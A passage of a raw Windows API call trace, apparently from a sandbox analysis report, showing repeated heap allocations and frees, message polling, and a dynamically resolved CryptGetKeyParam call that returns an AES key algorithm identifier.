Flags=0x0, Size=0x10) returned 0x43ca7d8 [0095.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0095.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0095.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0095.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0095.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0095.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0095.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0095.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0095.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0095.748] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0095.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0095.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0095.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0095.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0095.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0095.748] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0095.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0095.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0095.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0095.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0095.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0095.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0095.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0095.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0095.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0095.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0095.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0095.749] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0095.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0095.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0095.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0095.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2730 [0095.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0095.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0095.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0095.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0095.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa78 [0095.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0095.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0095.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0095.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0095.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0095.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0095.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0095.750] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0095.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0095.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0095.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0095.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0095.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0095.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0095.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0095.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0095.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0095.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0095.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0095.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0095.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0095.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0095.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0095.750] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0095.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0095.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0095.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0095.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0095.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0095.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0095.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0095.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0095.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0095.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0095.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0095.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0095.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0095.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0095.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0095.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0095.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0095.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0095.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0095.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0095.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0095.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0095.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0095.751] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0095.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0095.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0095.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0095.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0095.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0095.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0095.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0095.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0095.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0095.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0095.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0095.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0095.752] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0095.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0095.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0095.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa18 [0095.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0095.752] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0095.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0095.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0095.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0095.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0095.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0095.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0095.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0095.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0095.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0095.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0095.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0095.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0095.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0095.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0095.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0095.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0095.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0095.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0095.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0095.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0095.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0095.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0095.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0095.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0095.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0095.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0095.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0095.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0095.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0095.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0095.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0095.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0095.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0095.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0095.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0095.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0095.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0095.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797048 [0095.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0095.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0095.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0095.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0095.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0095.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0095.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0095.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0095.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0095.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0095.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0095.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0095.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0095.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0095.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0095.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0095.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0095.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0095.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0095.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0095.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0095.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0095.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0095.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0095.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0095.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0095.755] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0095.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0095.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0095.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0095.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0095.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0095.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0095.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0095.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0095.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0095.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0095.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0095.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0095.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0095.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0095.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0095.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0095.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0095.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0095.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0095.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0095.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0095.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0095.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0095.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0095.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0095.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0095.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0095.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0095.757] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0095.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0095.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0095.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0095.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0095.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0095.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0095.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0095.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0095.880] CryptGetKeyParam (in: hKey=0x41ac180, dwParam=0x7, pbData=0x43e2860, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2860*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0095.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0095.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0095.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0095.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0095.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0095.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0095.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0095.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0095.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0095.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0095.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0095.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0095.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0095.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0095.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0095.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0095.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0095.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0095.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0095.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0095.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0095.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0095.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0095.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0095.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0095.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0095.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0095.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0095.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0095.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0095.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 